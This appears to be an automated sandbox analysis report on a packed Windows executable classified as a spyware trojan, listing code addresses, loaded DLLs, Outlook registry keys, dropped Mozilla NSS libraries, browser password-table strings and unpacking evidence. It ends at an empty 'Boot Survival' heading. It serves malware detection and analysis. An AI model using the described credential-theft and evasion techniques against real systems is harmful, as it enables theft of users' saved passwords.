Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CBEB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEB8C0 rand_s,NtQueryVirtualMemory,	0_2_6CBEB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CBEB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CB8F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007908BD	0_2_007908BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006CE110	0_2_006CE110
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079AABC	0_2_0079AABC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0073E2BA	0_2_0073E2BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00786BEB	0_2_00786BEB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078D4B5	0_2_0078D4B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007836CA	0_2_007836CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00798EB3	0_2_00798EB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078869B	0_2_0078869B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00793F67	0_2_00793F67
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078EF51	0_2_0078EF51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0078BF18	0_2_0078BF18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB835A0	0_2_6CB835A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE34A0	0_2_6CBE34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEC4A0	0_2_6CBEC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB96C80	0_2_6CB96C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC6CF0	0_2_6CBC6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8D4E0	0_2_6CB8D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAD4D0	0_2_6CBAD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB964C0	0_2_6CB964C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF542B	0_2_6CBF542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC5C10	0_2_6CBC5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD2C10	0_2_6CBD2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFAC00	0_2_6CBFAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF545C	0_2_6CBF545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB95440	0_2_6CB95440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE85F0	0_2_6CBE85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC0DD0	0_2_6CBC0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB0512	0_2_6CBB0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAED10	0_2_6CBAED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9FD00	0_2_6CB9FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE4EA0	0_2_6CBE4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA5E90	0_2_6CBA5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEE680	0_2_6CBEE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8BEF0	0_2_6CB8BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9FEF0	0_2_6CB9FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF76E3	0_2_6CBF76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE9E30	0_2_6CBE9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC7E10	0_2_6CBC7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD5600	0_2_6CBD5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8C670	0_2_6CB8C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF6E63	0_2_6CBF6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA9E50	0_2_6CBA9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC3E50	0_2_6CBC3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD2E4E	0_2_6CBD2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA4640	0_2_6CBA4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD77A0	0_2_6CBD77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB6FF0	0_2_6CBB6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8DFE0	0_2_6CB8DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC7710	0_2_6CBC7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB99F00	0_2_6CB99F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB60A0	0_2_6CBB60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAC0E0	0_2_6CBAC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC58E0	0_2_6CBC58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF50C7	0_2_6CBF50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCB820	0_2_6CBCB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD4820	0_2_6CBD4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB97810	0_2_6CB97810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCF070	0_2_6CBCF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA8850	0_2_6CBA8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAD850	0_2_6CBAD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBD9B0	0_2_6CBBD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8C9A0	0_2_6CB8C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC5190	0_2_6CBC5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE2990	0_2_6CBE2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDB970	0_2_6CBDB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB170	0_2_6CBFB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9D960	0_2_6CB9D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAA940	0_2_6CBAA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9CAB0	0_2_6CB9CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF2AB0	0_2_6CBF2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB822A0	0_2_6CB822A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB4AA0	0_2_6CBB4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFBA90	0_2_6CBFBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA1AF0	0_2_6CBA1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCE2F0	0_2_6CBCE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC8AC0	0_2_6CBC8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC9A60	0_2_6CBC9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8F380	0_2_6CB8F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF53C8	0_2_6CBF53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCD320	0_2_6CBCD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9C370	0_2_6CB9C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB85340	0_2_6CB85340

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBC94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 003C45C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBBCBE8 appears 134 times

Source: file.exe, 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1689375768.000000006CE05000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: uwrqvymk ZLIB complexity 0.9945841633466136

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBE7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CBE7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_003D9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_003D3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\P9HV7HL0.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1688885384.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1689287244.000000006CDBF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1688885384.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1689287244.000000006CDBF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1688885384.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1689287244.000000006CDBF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1688885384.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1689287244.000000006CDBF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1688885384.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1689287244.000000006CDBF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1688885384.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1688885384.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1689287244.000000006CDBF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1542080417.0000000000F85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1526860279.000000001D4F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1541601703.000000001D4EB000.00000004.00000020.00020000.00000000.sdmp, KKJKKJJKJEGIECAKJJEB.0.dr, DBAEHCGHIIIDHIECFHJD.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1688885384.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1677546654.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1688885384.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1826816 > 1048576

Source: file.exe

Static PE information: Raw size of uwrqvymk is bigger than: 0x100000 < 0x197e00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1689287244.000000006CDBF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1689287244.000000006CDBF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.3c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;uwrqvymk:EW;ibgpdbrl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;uwrqvymk:EW;ibgpdbrl:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_003D9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c9597 should be: 0x1bef46

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: uwrqvymk
Source: file.exe	Static PE information: section name: ibgpdbrl
Source: file.exe	Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003DB035 push ecx; ret	0_2_003DB048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081C8AB push 64D9C369h; mov dword ptr [esp], ecx	0_2_0081C8F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081C8AB push edx; mov dword ptr [esp], eax	0_2_0081C91F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081C8AB push ecx; mov dword ptr [esp], eax	0_2_0081C94F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081C8AB push 2AFDAA54h; mov dword ptr [esp], ebx	0_2_0081C9E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F6853 push edx; mov dword ptr [esp], ebp	0_2_007F6867
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008398B1 push ebp; mov dword ptr [esp], 7F6FEFD0h	0_2_008398D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008398B1 push 3E257B1Ah; mov dword ptr [esp], eax	0_2_0083992D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008398B1 push 061CF59Bh; mov dword ptr [esp], eax	0_2_00839971
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008940CC push esi; mov dword ptr [esp], 63F164CCh	0_2_008940F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008940CC push ecx; mov dword ptr [esp], 5AEB3B64h	0_2_0089410D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008940CC push edx; mov dword ptr [esp], 02BCB13Dh	0_2_00894141
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008940CC push edi; mov dword ptr [esp], ebp	0_2_008941D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0085D0F9 push edx; mov dword ptr [esp], eax	0_2_0085D0FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0085D0F9 push esi; mov dword ptr [esp], ebx	0_2_0085D116
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00858002 push ecx; mov dword ptr [esp], ebp	0_2_0085801A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B88D1 push eax; mov dword ptr [esp], edx	0_2_007B88F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006278D0 push 04401311h; mov dword ptr [esp], ebp	0_2_006278EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006278D0 push ecx; mov dword ptr [esp], 7FF75022h	0_2_006278EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084E03E push esi; mov dword ptr [esp], edx	0_2_0084E085
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084E03E push 0542BD03h; mov dword ptr [esp], esi	0_2_0084E0A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084E03E push 4A9ACDC1h; mov dword ptr [esp], eax	0_2_0084E101
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0086B847 push esi; mov dword ptr [esp], ebp	0_2_0086B9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007908BD push ecx; mov dword ptr [esp], ebp	0_2_007908C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007908BD push edi; mov dword ptr [esp], eax	0_2_007908E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007908BD push ecx; mov dword ptr [esp], edi	0_2_00790954
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007908BD push 23B33D86h; mov dword ptr [esp], edi	0_2_0079097D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007908BD push 55877276h; mov dword ptr [esp], edi	0_2_00790A1E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007908BD push 3FE83529h; mov dword ptr [esp], ebx	0_2_00790A4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007908BD push 4354B6C7h; mov dword ptr [esp], edi	0_2_00790A71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007908BD push edx; mov dword ptr [esp], ebp	0_2_00790C0A

Source: file.exe

Static PE information: section name: uwrqvymk entropy: 7.953035524358767

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

